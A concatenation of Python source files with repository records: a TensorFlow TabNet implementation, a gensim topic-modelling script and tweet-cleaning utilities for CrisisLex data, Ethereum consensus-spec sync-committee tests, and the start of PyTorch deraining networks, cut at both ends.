is necessary because batch normalization should still be uniquely initialized
due to the masked inputs in TabNet steps being in a different scale than the
original input. Default (None) creates a new FC layer.
virtual_batch_size: int
Batch size for Ghost Batch Normalization (GBN). Value should be much smaller
than and a factor of the overall batch size. Default (None) runs regular batch
normalization. If an integer value is specified, GBN is run with that virtual
batch size.
momentum: float
Momentum for exponential moving average in batch normalization. Lower values
correspond to larger impact of batch on the rolling statistics computed in
each batch. Valid values range from 0.0 to 1.0. Default (0.98).
"""
super(GLULayer, self).__init__(**kwargs)
self.units = units
self.virtual_batch_size = virtual_batch_size
self.momentum = momentum
if fc_layer:
self.fc = fc_layer
else:
self.fc = tf.keras.layers.Dense(self.units*2, use_bias=False)
self.bn = tf.keras.layers.BatchNormalization(virtual_batch_size=self.virtual_batch_size,
momentum=self.momentum)
def call(self, inputs: tf.Tensor, training: Optional[bool] = None) -> tf.Tensor:
x = self.fc(inputs)
x = self.bn(x, training=training)
x = tf.math.multiply(x[:, :self.units], tf.nn.sigmoid(x[:, self.units:]))
return x
class FeatureTransformer(tf.keras.layers.Layer):
def __init__(
self,
n_dependent_glus: int = 2,
shared_glu_fc_layers: Optional[List[tf.keras.layers.Dense]] = None,
units: int = 16,
virtual_batch_size: Optional[int] = None,
momentum: float = 0.98,
**kwargs
):
"""
Creates a feature transformer for non-linear processing of features.
Parameters:
-----------
n_dependent_glus: int
Number of step-dependent GLU layers within the Feature Transformer. Increasing
the number of step-dependent layers is an effective strategy to improve predictive
performance. Default (2).
shared_glu_fc_layers: List[tf.keras.layers.Dense]
A list of dense layers to construct shared GLU layers. Default (None) creates only
n_dependent_glus dependent GLU layers and no shared layers. Total number of GLU layers
in this feature transformer is len(shared_glu_layers) + n_dependent_glus.
units: int
Number of units in each GLU layer. Default (16).
virtual_batch_size: int
Batch size for Ghost Batch Normalization (GBN). Value should be much smaller
than and a factor of the overall batch size. Default (None) runs regular batch
normalization. If an integer value is specified, GBN is run with that virtual
batch size.
momentum: float
Momentum for exponential moving average in batch normalization. Lower values
correspond to larger impact of batch on the rolling statistics computed in
each batch. Valid values range from 0.0 to 1.0. Default (0.98).
"""
super(FeatureTransformer, self).__init__(**kwargs)
n_glu_layers = (len(shared_glu_fc_layers) if shared_glu_fc_layers else 0) + n_dependent_glus
if n_glu_layers <= 0:
raise ValueError("Invalid Argument: Total number of GLU layers in the feature transformer"
" should be greater than 0.")
self.units = units
self.norm_factor = tf.math.sqrt(tf.constant(0.5))
self.glu_layers = list()
for i in range(n_glu_layers):
fc_layer = None
if shared_glu_fc_layers:
if i < len(shared_glu_fc_layers):
fc_layer = shared_glu_fc_layers[i]
glu_layer = GLULayer(
units=self.units,
fc_layer=fc_layer,
virtual_batch_size=virtual_batch_size,
momentum=momentum,
)
self.glu_layers.append(glu_layer)
def build(self, input_shape: tf.TensorShape):
if input_shape[-1] != self.units:
self.omit_first_residual = True
else:
self.omit_first_residual = False
def call(self, inputs: tf.Tensor, training: Optional[bool] = None) -> tf.Tensor:
for i, glu_layer in enumerate(self.glu_layers):
x = glu_layer(inputs, training=training)
if self.omit_first_residual and (i==0):
inputs = x
else:
x = tf.math.multiply(self.norm_factor, tf.math.add(inputs, x))
inputs = x
return x
class Split(tf.keras.layers.Layer):
def __init__(
self,
split_dim: int = 8,
**kwargs
):
"""
Splits the input tensor into two at a specified column dimension.
Parameters:
-----------
split_dim: int
Column dimension where the input tensor should be split into two. Default (8).
"""
super(Split, self).__init__(**kwargs)
self.split_dim = split_dim
def call(self, inputs: tf.Tensor) -> Tuple[tf.Tensor]:
return inputs[:, :self.split_dim], inputs[:, self.split_dim:]
class AttentiveTransformer(tf.keras.layers.Layer):
def __init__(
self,
units: int,
n_steps: int = 3,
epsilon: float = 1e-15,
lambda_sparse: float = 1e-3,
virtual_batch_size: Optional[int] = None,
momentum: float = 0.98,
mask_type: str = "sparsemax",
**kwargs
):
"""
Creates an attentive transformer that learns masks to select salient features
for further analysis. This layer propagates the sparsity regularization loss
to the Keras model/layer that calls this layer.
Parameters:
-----------
units: int
Number of units in layer. This layer outputs a mask for your data, so the
number of units should be the same as your data dimension.
n_steps: int
Number of sequential attention steps. Typically ranges from 3 to 10. If the
data has more informative features, the number of steps is higher. Large
values may lead to overfitting. Default (3).
epsilon: float
Prevent computing log(0) by adding a small constant log(0+epsilon). Default (1e-15).
lambda_sparse: float
Coefficient for the mask sparsity loss. Important parameter to tune. Lower values
lead to better performance. Default (1e-3).
virtual_batch_size: int
Batch size for Ghost Batch Normalization (GBN). Value should be much smaller
than and a factor of the overall batch size. Default (None) runs regular batch
normalization. If an integer value is specified, GBN is run with that virtual
batch size.
momentum: float
Momentum for exponential moving average in batch normalization. Lower values
correspond to larger impact of batch on the rolling statistics computed in
each batch. Valid values range from 0.0 to 1.0. Default (0.98).
mask_type: str
mask_type ∈ {"softmax", "entmax", "sparsemax"}. Softmax generates a dense mask.
Entmax (i.e. entmax 1.5) generates a slightly sparser mask. Default(sparsemax)
generates a highly sparse mask.
To learn more, refer: https://arxiv.org/abs/1905.05702.
"""
super(AttentiveTransformer, self).__init__(**kwargs)
# for computing sparsity regularization loss
self.n_steps = n_steps
self.epsilon = epsilon
self.lambda_sparse = lambda_sparse
# attentive transformer layers
self.fc = tf.keras.layers.Dense(units, use_bias=False)
self.bn = tf.keras.layers.BatchNormalization(virtual_batch_size=virtual_batch_size,
momentum=momentum)
if mask_type == "sparsemax":
self.sparse_activation = tfa.activations.sparsemax
elif mask_type == "entmax":
self.sparse_activation = entmax15
elif mask_type == "softmax":
self.sparse_activation = tf.nn.softmax
else:
raise NotImplementedError(
"Available options for mask_type: {'sparsemax', 'entmax', 'softmax'}"
)
def call(self, inputs: tf.Tensor, prior: tf.Tensor, training: Optional[bool] = None) -> tf.Tensor:
x = self.fc(inputs)
x = self.bn(x, training=training)
x = tf.multiply(prior, x)
x = self.sparse_activation(x, axis=-1)
# propagate sparsity loss from current mask
sparsity_reg_loss = tf.reduce_mean(
tf.reduce_sum(
tf.multiply(-x, tf.math.log(x+self.epsilon)),
axis=-1
)
)
sparsity_reg_loss /= self.n_steps
self.add_loss(self.lambda_sparse*sparsity_reg_loss)
return x
class TabNetEncoder(tf.keras.layers.Layer):
def __init__(
self,
decision_dim: int = 8,
attention_dim: int = 8,
n_steps: int = 3,
n_shared_glus: int = 2,
n_dependent_glus: int = 2,
relaxation_factor: float = 1.3,
epsilon: float = 1e-15,
virtual_batch_size: Optional[int] = None,
momentum: float = 0.98,
mask_type: str = "sparsemax",
lambda_sparse: float = 1e-3,
**kwargs
):
"""
Creates a TabNet encoder network.
Parameters:
-----------
decision_dim: int
Dimension of the decision layer. Typically ranges from 8 to 128. Assuming
decision_dim to be equal to attention_dim is sensible. Large values may lead
to overfitting. Default (8).
attention_dim: int
Dimension of the attention layer. Typically ranges from 8 to 128. Assuming
attention_dim to be equal to decision_dim is sensible. Large values may lead
to overfitting. Default (8).
n_steps: int
Number of sequential attention steps. Typically ranges from 3 to 10. If the
data has more informative features, the number of steps is higher. Large
values may lead to overfitting. Default (3).
n_shared_glus: int
Number of shared GLU layers within the Feature Transformer. Increasing the
number of shared layers is an effective strategy to improve predictive performance
without a significant increase in the number of parameters. Default (2).
n_dependent_glus: int
Number of step-dependent GLU layers within the Feature Transformer. Increasing
the number of step-dependent layers is an effective strategy to improve predictive
performance. Default (2).
relaxation_factor: float
Relaxation parameter used to compute the prior in the Attentive Transformer
layers. Typically ranges from 1.0 to 2.0. This is an important hyperparameter
to tune in TabNets. Default (1.3).
epsilon: float
Prevent computing log(0) by adding a small constant log(0+epsilon). Default (1e-15).
virtual_batch_size: int
Batch size for Ghost Batch Normalization (GBN). Value should be much smaller
than and a factor of the overall batch size. Default (None) runs regular batch
normalization. If an integer value is specified, GBN is run with that virtual
batch size.
momentum: float
Momentum for exponential moving average in batch normalization. Lower values
correspond to larger impact of batch on the rolling statistics computed in
each batch. Valid values range from 0.0 to 1.0. Default (0.98).
mask_type: str
mask_type ∈ {"softmax", "entmax", "sparsemax"}. Softmax generates a dense mask.
Entmax (i.e. entmax 1.5) generates a slightly sparser mask. Default(sparsemax)
generates a highly sparse mask.
To learn more, refer: https://arxiv.org/abs/1905.05702.
lambda_sparse: float
Coefficient for the mask sparsity loss. Important parameter to tune. Lower values
lead to better performance. Default (1e-3).
"""
super(TabNetEncoder, self).__init__(**kwargs)
self.decision_dim = decision_dim
self.n_steps = n_steps
self.n_dependent_glus = n_dependent_glus
self.relaxation_factor = relaxation_factor
self.epsilon = epsilon
self.virtual_batch_size = virtual_batch_size
self.momentum = momentum
self.mask_type = mask_type
self.lambda_sparse = lambda_sparse
# plain batch normalization
self.initial_bn = tf.keras.layers.BatchNormalization(momentum=self.momentum)
# shared glu layers
self.glu_dim = decision_dim + attention_dim
self.shared_glu_fc_layers = list()
for _ in range(n_shared_glus):
self.shared_glu_fc_layers.append(tf.keras.layers.Dense(units=self.glu_dim*2, use_bias=False))
# initial feature transformer
self.initial_feature_transformer = FeatureTransformer(
n_dependent_glus=self.n_dependent_glus,
shared_glu_fc_layers=self.shared_glu_fc_layers,
units=self.glu_dim,
virtual_batch_size=self.virtual_batch_size,
momentum=self.momentum,
name="FeatureTransformer_Step_0",
)
# split layer
self.split_layer = Split(split_dim=decision_dim)
def build(self, input_shape: tf.TensorShape):
feature_dim = input_shape[-1]
# feature and attentive transformers for each step
self.step_feature_transformers = list()
self.step_attentive_transformers = list()
for step in range(self.n_steps):
feature_transformer = FeatureTransformer(
n_dependent_glus=self.n_dependent_glus,
shared_glu_fc_layers=self.shared_glu_fc_layers,
units=self.glu_dim,
virtual_batch_size=self.virtual_batch_size,
momentum=self.momentum,
name=f"FeatureTransformer_Step_{(step+1)}",
)
attentive_transformer = AttentiveTransformer(
units=feature_dim,
n_steps=self.n_steps,
epsilon=self.epsilon,
lambda_sparse=self.lambda_sparse,
virtual_batch_size=self.virtual_batch_size,
momentum=self.momentum,
mask_type = self.mask_type,
name=f"AttentiveTransformer_Step_{(step+1)}",
)
self.step_feature_transformers.append(
feature_transformer
)
self.step_attentive_transformers.append(
attentive_transformer
)
def call(self, inputs: tf.Tensor, prior: Optional[tf.Tensor] = None,
training: Optional[bool] = None) -> tf.Tensor:
batch_size = tf.shape(inputs)[0]
step_output_aggregate = tf.zeros((batch_size, self.decision_dim))
if prior is None:
prior = tf.ones_like(inputs)
x = self.initial_bn(inputs, training=training)
x_proc = self.initial_feature_transformer(x, training=training)
_, x_a = self.split_layer(x_proc)
for step in range(self.n_steps):
# step operations
mask = self.step_attentive_transformers[step](x_a,
prior=prior,
training=training)
masked_x = tf.multiply(mask, x)
x_proc = self.step_feature_transformers[step](masked_x,
training=training)
x_d, x_a = self.split_layer(x_proc)
step_output = tf.keras.activations.relu(x_d)
# for prediction
step_output_aggregate += step_output
# update prior
prior = tf.multiply(self.relaxation_factor - mask, prior)
return step_output_aggregate
def calculate_feature_attribution(self, inputs: tf.Tensor) -> Tuple[tf.Tensor, Dict[int, tf.Tensor]]:
feature_attribution = tf.zeros_like(inputs)
masks = dict()
prior = tf.ones_like(inputs)
x = self.initial_bn(inputs, training=False)
x_proc = self.initial_feature_transformer(x, training=False)
_, x_a = self.split_layer(x_proc)
for step in range(self.n_steps):
# step operations
mask = self.step_attentive_transformers[step](x_a,
prior=prior,
training=False)
masked_x = tf.multiply(mask, x)
x_proc = self.step_feature_transformers[step](masked_x,
training=False)
x_d, x_a = self.split_layer(x_proc)
step_output = tf.keras.activations.relu(x_d)
# for interpretation
masks[step] = mask
step_coefficient = tf.reshape(
tf.math.reduce_sum(step_output, axis=-1),
shape=(-1,1)
)
feature_attribution += tf.multiply(step_coefficient, mask)
# update prior
prior = tf.multiply(self.relaxation_factor - mask, prior)
# normalization
feature_attribution /= tf.reshape(
tf.reduce_sum(feature_attribution, axis=-1),
shape=(-1,1)
)
return feature_attribution, masks
class TabNetDecoder(tf.keras.layers.Layer):
def __init__(
self,
reconstruction_dim: int,
n_steps: int = 3,
n_shared_glus: int = 1,
n_dependent_glus: int = 1,
virtual_batch_size: Optional[int] = None,
momentum: float = 0.98,
**kwargs
):
"""
Creates a TabNet decoder network.
Parameters
-----------
reconstruction_dim: int
Dimension of the decoder network's output layer.
n_steps: int
Number of sequential attention steps. Typically ranges from 3 to 10. If the
data has more informative features, the number of steps is higher. Large
values may lead to overfitting. Default (3).
n_shared_glus: int
Number of shared GLU layers within the Feature Transformer. Increasing the
number of shared layers is an effective strategy to improve predictive performance
            without a significant increase in the number of parameters. Default (1).
n_dependent_glus: int
Number of step-dependent GLU layers within the Feature Transformer. Increasing
the number of step-dependent layers is an effective strategy to improve predictive
            performance. Default (1).
virtual_batch_size: int
Batch size for Ghost Batch Normalization (GBN). Value should be much smaller
than and a factor of the overall batch size. Default (None) runs regular batch
normalization. If an integer value is specified, GBN is run with that virtual
batch size.
momentum: float
Momentum for exponential moving average in batch normalization. Lower values
correspond to larger impact of batch on the rolling statistics computed in
each batch. Valid values range from 0.0 to 1.0. Default (0.98).
"""
super(TabNetDecoder, self).__init__(**kwargs)
self.reconstruction_dim = reconstruction_dim
self.n_steps = n_steps
self.n_shared_glus = n_shared_glus
self.n_dependent_glus = n_dependent_glus
self.virtual_batch_size = virtual_batch_size
self.momentum = momentum
def build(self, input_shape: tf.TensorShape):
latent_dim = input_shape[-1]
# shared glu layers
self.shared_glu_fc_layers = list()
for _ in range(self.n_shared_glus):
self.shared_glu_fc_layers.append(tf.keras.layers.Dense(units=latent_dim*2, use_bias=False))
# feature and attentive transformers for each step
self.step_feature_transformers = list()
self.step_fc_layers = list()
for step in range(self.n_steps):
feature_transformer = FeatureTransformer(
n_dependent_glus=self.n_dependent_glus,
shared_glu_fc_layers=self.shared_glu_fc_layers,
units=latent_dim,
virtual_batch_size=self.virtual_batch_size,
momentum=self.momentum,
name=f"FeatureTransformer_Decoder_Step_{(step+1)}",
)
fc_layer = tf.keras.layers.Dense(
units=self.reconstruction_dim,
use_bias=False,
name=f"FC_Decoder_Step_{(step+1)}",
)
self.step_feature_transformers.append(
feature_transformer
)
self.step_fc_layers.append(
fc_layer
)
def call(self, inputs: tf.Tensor) -> tf.Tensor:
        batch_dim = tf.shape(inputs)[0]  # batch size (axis 0), not the feature dimension
        reconstructed_features = tf.zeros((batch_dim, self.reconstruction_dim))
        for step in range(self.n_steps):
            # step operation: the step's FC layer consumes the feature transformer output
            x = self.step_feature_transformers[step](inputs,
                                                     training=False)
            x = self.step_fc_layers[step](x)
            reconstructed_features += x
return reconstructed_features
class TabularEmbedding(tf.keras.layers.Layer):
def __init__(
self,
feature_names: List[str],
categorical_str_indices: List[int],
categorical_dims: List[int],
categorical_embed_dims: Union[int, List[int]],
**kwargs
):
"""
Creates an embedding layer for categorical variables. Numerical variables are
untouched.
Parameters
-----------
feature_names: List[str]
A list of feature names in order that they are expected to be input into the
"""
super(TabularEmbedding, self).__init__(**kwargs)
```
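A minimal sketch of wiring the encoder above into a Keras classifier, assuming purely numerical inputs (so the incomplete `TabularEmbedding` layer is not needed); the feature count, class count, hyperparameters, and import path are illustrative.
```python
# Sketch only; dimensions and the module path are assumptions.
import tensorflow as tf
from tf_tabnet.tabnet_model import TabNetEncoder
n_features, n_classes = 54, 7
inputs = tf.keras.Input(shape=(n_features,))
encoder = TabNetEncoder(decision_dim=16, attention_dim=16, n_steps=4, relaxation_factor=1.5)
encoded = encoder(inputs)  # aggregated ReLU decision embeddings over all steps
outputs = tf.keras.layers.Dense(n_classes, activation="softmax")(encoded)
model = tf.keras.Model(inputs, outputs)
# The sparsity loss added inside AttentiveTransformer is collected via model.losses.
model.compile(optimizer="adam", loss="sparse_categorical_crossentropy", metrics=["accuracy"])
```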
|
{
"source": "jeyadosstimothy/ML-on-CrisisLex",
"score": 3
}
|
#### File: jeyadosstimothy/ML-on-CrisisLex/topicModelling.py
```python
import utils, constants
import sys, pickle, argparse
from gensim import corpora
from gensim.models.ldamodel import LdaModel
from gensim.models.lsimodel import LsiModel
def parseArgs():
parser = argparse.ArgumentParser()
parser.add_argument('-r', '--reprocessDataset', action='store_true',
help='Must be specified when running the program for the first time '+
'(when preprocessed dataset is not available). '+
'If specified, reads and processes the dataset again. '+
'Else reads an already processed dataset from ' + constants.CLASSIFICATION_DATA_PATH)
return parser.parse_args(sys.argv[1:])
def printTopics(model):
predicted_topics = model.print_topics(num_topics=5, num_words=5)
for i, topics in predicted_topics:
print('Words in Topic {}:\n {}'.format(i+1, topics))
if __name__ == '__main__':
arguments = parseArgs()
dataset = utils.loadDataset(arguments.reprocessDataset, classification=False, splitWords=True)
# Creating dictionary from dataset, where each unique term is assigned an index
dictionary = corpora.Dictionary(dataset)
# Converting list of documents into Bag of Words using dictionary
doc_term_matrix = [dictionary.doc2bow(doc) for doc in dataset]
# Training models on the document term matrix
modelList = [ LdaModel(doc_term_matrix, num_topics=10, id2word=dictionary, passes=2),
LsiModel(doc_term_matrix, num_topics=10, id2word=dictionary)
]
for model in modelList:
print('Topic Modelling using %s' % utils.getClassName(model))
printTopics(model)
utils.saveModel(model)
```
#### File: jeyadosstimothy/ML-on-CrisisLex/utils.py
```python
import pandas, os, re, string, nltk, langid, itertools, pickle
import constants
LANGID_EN = 'en'
NLTK_EN = 'english'
NLTK_WORDNET = 'wordnet'
NLTK_STOPWORDS = 'stopwords'
nltk.download(NLTK_WORDNET)
nltk.download(NLTK_STOPWORDS)
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.stem.snowball import SnowballStemmer
stopwordsSet = set(stopwords.words(NLTK_EN))
punctuations = string.punctuation
lemmatizer = WordNetLemmatizer()
stemmer = SnowballStemmer(NLTK_EN)
def cleanTweets(data, splitWords=False):
def clean(text):
lower = text.lower()
usersRemoved = re.sub(r'(rt )?@[^ \t]*:?', '', lower)
urlRemoved = re.sub(r'http[^ \t]*', ' ', usersRemoved)
specialRemoved = re.sub(r'[“”–—…😩😢🙏❤😐😕😔☔😱😥💔😨【】’]', '', urlRemoved)
numbersRemoved = re.sub(r'[^ \t]*[0-9]+[^ \t]*', '', specialRemoved)
x = re.sub(r'&', '', numbersRemoved)
puncRemoved = x.translate(str.maketrans(punctuations, ' '*len(punctuations)))
singleSpace = re.sub(r'[ \t]+', ' ', puncRemoved)
stopwordsRemoved = tuple(i for i in singleSpace.strip().split() if i not in stopwordsSet and len(i)>3)
lemmatized = tuple(lemmatizer.lemmatize(word) for word in stopwordsRemoved)
stemmed = tuple(stemmer.stem(word) for word in lemmatized)
results = lemmatized
if splitWords:
return results
else:
return ' '.join(results)
if type(data) is str:
return clean(data)
elif type(data) is pandas.DataFrame:
data[constants.TWEET_COLUMN] = data[constants.TWEET_COLUMN].apply(clean)
return data
def removeUnrelatedTweets(df):
# Removes tweets that are marked 'Not Related' or 'Not Applicable'
df = df[df[constants.LABEL_COLUMN]!= constants.NOT_RELATED]
df = df[df[constants.LABEL_COLUMN]!= constants.NOT_APPLICABLE]
return df
def keepEnglishTweets(df):
# Removes tweets that are not in english
return df[df[constants.TWEET_COLUMN].map(lambda x: langid.classify(x)[0] == LANGID_EN)]
def getDatasetCsvPaths(path):
# gets all the CSV files of the CrisisLexT26 Dataset
csvPaths = []
for root, dirs, files in os.walk(path):
for file in files:
if re.match(constants.TWEET_DATA_CSV_REGEX, file):
csvPaths.append(os.path.join(root, file))
return csvPaths
def getDisasterNameFromPath(path):
# extracts the disaster name from the folder name in the given path
return re.match(constants.DISASTER_NAME_REGEX, path).group(1)
def setDisasterName(df, name):
# Sets 'Not Related' and 'Not Applicable' to 'off-topic' and sets remaining rows to disaster name
df.loc[df[constants.LABEL_COLUMN] == constants.NOT_RELATED, constants.LABEL_COLUMN] = constants.OFF_TOPIC_LABEL
df.loc[df[constants.LABEL_COLUMN] == constants.NOT_APPLICABLE, constants.LABEL_COLUMN] = constants.OFF_TOPIC_LABEL
df.loc[df[constants.LABEL_COLUMN] != constants.OFF_TOPIC_LABEL, constants.LABEL_COLUMN] = name
return df
def createClassificationDf(dfList, splitWords):
# Returns Dataframe that is the combination of all 26 disasters
# Marks tweets with disaster name, drops duplicate tweets, removes non-english tweets and cleans the remaining ones
for i in range(len(dfList)):
disasterName = getDisasterNameFromPath(dfList[i]['path'])
dfList[i]['df'] = setDisasterName(dfList[i]['df'], disasterName)
df = pandas.concat(i['df'] for i in dfList)
df = df.drop_duplicates(constants.TWEET_COLUMN)
df = keepEnglishTweets(df)
df = cleanTweets(df, splitWords)
return df
def createDocumentCorpus(dfList, splitWords):
# Creates a list of documents, each document containing all the words in the tweets related to the corresponding disaster
dfList = list(i['df'] for i in dfList)
documentList = []
for i in range(len(dfList)):
dfList[i] = removeUnrelatedTweets(dfList[i])
dfList[i] = dfList[i].drop_duplicates(constants.TWEET_COLUMN)
dfList[i] = keepEnglishTweets(dfList[i])
dfList[i] = cleanTweets(dfList[i], splitWords)
document = tuple(itertools.chain.from_iterable(dfList[i][constants.TWEET_COLUMN]))
documentList.append(document)
return documentList
def readDataset(path, classification, splitWords):
csvPaths = getDatasetCsvPaths(path)
dfList = [{'path': path, 'df': pandas.read_csv(path)} for path in csvPaths]
if classification:
return createClassificationDf(dfList, splitWords)
else:
return createDocumentCorpus(dfList, splitWords)
def getClassName(obj):
return obj.__class__.__name__
def saveModel(trainedModel, filePrefix=''):
# saves the trained model to pickle file
filename = filePrefix + getClassName(trainedModel) + '.pickle'
createDirectoryIfNotExists(constants.MODELS_PATH)
path = os.path.join(constants.MODELS_PATH, filename)
print('Saving model to %s' % path)
pickle.dump(trainedModel, open(path, 'wb'))
def loadDataset(reprocessDataset=False, classification=True, splitWords=False):
# reads dataset, processes it and stores it for future use if reprocessDataset is True
# else loads the preprocessed dataset and returns it
createDirectoryIfNotExists(constants.RESOURCES_PATH)
processedDataPath = constants.CLASSIFICATION_DATA_PATH if classification else constants.TOPIC_MODEL_DATA_PATH
if reprocessDataset:
print('Reading and Processing Dataset from %s' % constants.DATASET_PATH)
dataset = readDataset(constants.DATASET_PATH, classification, splitWords)
print('Storing Processed Dataset to %s' % processedDataPath)
pickle.dump(dataset, open(processedDataPath, 'wb'))
else:
print('Reading Preprocessed Dataset from %s' % processedDataPath)
dataset = pickle.load(open(processedDataPath, 'rb'))
return dataset
def createDirectoryIfNotExists(path):
# Returns True if directory did not exist and was created. Else returns False
if not os.path.exists(path):
os.makedirs(path)
return True
return False
```
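A small sketch of the `cleanTweets` helper above on a single made-up tweet, independent of the CrisisLex CSVs.
```python
import utils
# Hypothetical tweet, used only to illustrate what cleanTweets produces.
raw = "RT @user: Flooding near the river, stay safe! http://example.com"
print(utils.cleanTweets(raw))                   # space-joined lemmatized tokens
print(utils.cleanTweets(raw, splitWords=True))  # tuple of tokens, as used for topic modelling
```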
|
{
"source": "jeyakatsa/consensus-specs",
"score": 2
}
|
#### File: unittests/networking/test_networking.py
```python
from eth2spec.test.context import (
with_altair_and_later,
spec_state_test,
)
from eth2spec.test.helpers.state import (
transition_to,
)
@with_altair_and_later
@spec_state_test
def test_get_sync_subcommittee_pubkeys_current_sync_committee(state, spec):
# Transition to the head of the next period
transition_to(spec, state, spec.SLOTS_PER_EPOCH * spec.EPOCHS_PER_SYNC_COMMITTEE_PERIOD)
next_slot_epoch = spec.compute_epoch_at_slot(state.slot + 1)
assert (
spec.compute_sync_committee_period(spec.get_current_epoch(state))
== spec.compute_sync_committee_period(next_slot_epoch)
)
sync_committee = state.current_sync_committee
sync_subcommittee_size = spec.SYNC_COMMITTEE_SIZE // spec.SYNC_COMMITTEE_SUBNET_COUNT
subcommittee_index = 1
i = subcommittee_index * sync_subcommittee_size
expect = sync_committee.pubkeys[i:i + sync_subcommittee_size]
assert spec.get_sync_subcommittee_pubkeys(state, subcommittee_index) == expect
@with_altair_and_later
@spec_state_test
def test_get_sync_subcommittee_pubkeys_next_sync_committee(state, spec):
# Transition to the end of the current period
transition_to(spec, state, spec.SLOTS_PER_EPOCH * spec.EPOCHS_PER_SYNC_COMMITTEE_PERIOD - 1)
next_slot_epoch = spec.compute_epoch_at_slot(state.slot + 1)
assert (
spec.compute_sync_committee_period(spec.get_current_epoch(state))
!= spec.compute_sync_committee_period(next_slot_epoch)
)
sync_committee = state.next_sync_committee
sync_subcommittee_size = spec.SYNC_COMMITTEE_SIZE // spec.SYNC_COMMITTEE_SUBNET_COUNT
subcommittee_index = 1
i = subcommittee_index * sync_subcommittee_size
expect = sync_committee.pubkeys[i:i + sync_subcommittee_size]
assert spec.get_sync_subcommittee_pubkeys(state, subcommittee_index) == expect
```
|
{
"source": "jeya-maria-jose/Derain_OUCD_Net",
"score": 2
}
|
#### File: jeya-maria-jose/Derain_OUCD_Net/derain_mulcmp.py
```python
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.model_zoo as model_zoo
import torchvision.models as models
from collections import OrderedDict
from torch.autograd import Variable
class unet(nn.Module):
def __init__(self):
super(unet, self).__init__()
self.encoder1 = nn.Conv2d(3, 32, 3, stride=1, padding=1) # b, 16, 10, 10
self.encoder2= nn.Conv2d(32, 64, 3, stride=1, padding=1) # b, 8, 3, 3
self.encoder3= nn.Conv2d(64, 128, 3, stride=1, padding=1)
self.encoder4= nn.Conv2d(128, 256, 3, stride=1, padding=1)
self.encoder5= nn.Conv2d(256, 512, 3, stride=1, padding=1)
self.decoder1 = nn.Conv2d(512, 256, 3, stride=1,padding=1) # b, 16, 5, 5
self.decoder2 = nn.Conv2d(256, 128, 3, stride=1, padding=1) # b, 8, 15, 1
self.decoder3 = nn.Conv2d(128, 64, 3, stride=1, padding=1) # b, 1, 28, 28
self.decoder4 = nn.Conv2d(64, 32, 3, stride=1, padding=1)
self.decoder5 = nn.Conv2d(32, 3, 3, stride=1, padding=1)
self.tan = nn.Tanh()
# self.soft = nn.Softmax(dim =1)
def forward(self, x):
out = F.relu(F.max_pool2d(self.encoder1(x),2,2))
t1 = out
out = F.relu(F.max_pool2d(self.encoder2(out),2,2))
t2 = out
out = F.relu(F.max_pool2d(self.encoder3(out),2,2))
t3 = out
out = F.relu(F.max_pool2d(self.encoder4(out),2,2))
t4 = out
out = F.relu(F.max_pool2d(self.encoder5(out),2,2))
# t2 = out
out = F.relu(F.interpolate(self.decoder1(out),scale_factor=(2,2),mode ='bilinear'))
# print(out.shape,t4.shape)
out = torch.add(out,t4)
out = F.relu(F.interpolate(self.decoder2(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,t3)
out = F.relu(F.interpolate(self.decoder3(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,t2)
out = F.relu(F.interpolate(self.decoder4(out),scale_factor=(2,2),mode ='bilinear'))
out = torch.add(out,t1)
out = F.relu(F.interpolate(self.decoder5(out),scale_factor=(2,2),mode ='bilinear'))
# print(out.shape)
# out = self.soft(out)
return self.tan(out)
class OUCD_lite(nn.Module):
def __init__(self):
super(OUCD_lite, self).__init__()
self.encoder1 = nn.Conv2d(3, 32, 3, stride=1, padding=1) # b, 16, 10, 10
self.bne1 = nn.InstanceNorm2d(32)
self.encoder2= nn.Conv2d(32, 64, 3, stride=1, padding=1) # b, 8, 3, 3
self.bne2 = nn.InstanceNorm2d(64)
self.encoder3= nn.Conv2d(64, 128, 3, stride=1, padding=1)
self.bne3 = nn.InstanceNorm2d(128)
self.encoder4= nn.Conv2d(128, 256, 3, stride=1, padding=1)
self.encoder5= nn.Conv2d(256, 512, 3, stride=1, padding=1)
self.encoder6= nn.Conv2d(512, 1024, 3, stride=1, padding=1)
self.decoder1= nn.Conv2d(1024,512, 3, stride=1, padding=1)
self.decoder2 = nn.Conv2d(512, 256, 3, stride=1, padding=1) # b, 1, 28, 28
self.bnd1 = nn.InstanceNorm2d(64)
self.decoder3 = nn.Conv2d(256, 128, 3, stride=1, padding=1)
self.bnd2 = nn.InstanceNorm2d(32)
self.decoder4 = nn.Conv2d(128, 64, 3, stride=1, padding=1)
self.bnd3 = nn.InstanceNorm2d(16)
self.decoder5 = nn.Conv2d(64, 32, 3, stride=1, padding=1)
self.decoder6 = nn.Conv2d(32, 16, 3, stride=1, padding=1)
# self.encoder5= nn.Conv2d(512, 1024, 3, stride=1, padding=1)
self.decoderf1 = nn.Conv2d(128, 64, 3, stride=1, padding=1)
self.bndf1 = nn.InstanceNorm2d(64)
self.decoderf2= nn.Conv2d(64, 32, 3, stride=1, padding=1)
self.bndf2 = nn.InstanceNorm2d(32)
self.decoderf3 = nn.Conv2d(32, 16, 3, stride=1, padding=1)
self.bndf3 = nn.InstanceNorm2d(16)
self.decoderf4 = nn.Conv2d(16, 16, 3, stride=1, padding=1)
self.decoderf5 = nn.Conv2d(16, 16, 3, stride=1, padding=1)
self.encoderf1 = nn.Conv2d(3, 32, 3, stride=1, padding=1)
self.bnef1 = nn.InstanceNorm2d(32)
self.encoderf2= nn.Conv2d(32, 64, 3, stride=1, padding=1)
self.bnef2 = nn.InstanceNorm2d(64)
self.encoderf3 = nn.Conv2d(64, 128, 3, stride=1, padding=1)
self.bnef3 = nn.InstanceNorm2d(128)
self.encoderf4 = nn.Conv2d(128, 128, 3, stride=1, padding=1)
self.encoderf5 = nn.Conv2d(128, 128, 3, stride=1, padding=1)
self.final = nn.Conv2d(16,3,1,stride=1,padding=0)
self.bnf = nn.InstanceNorm2d(3)
self.tmp1 = nn.Conv2d(64,32,1,stride=1,padding=0)
self.bnt1 = nn.InstanceNorm2d(32)
self.tmp2 = nn.Conv2d(128,32,1,stride=1,padding=0)
# self.bnt2 = nn.BatchNorm2d(32)
self.tmp3 = nn.Conv2d(64,32,1,stride=1,padding=0)
self.tmpf3 = nn.Conv2d(128,32,1,stride=1,padding=0)
self.tmpf2 = nn.Conv2d(64,32,1,stride=1,padding=0)
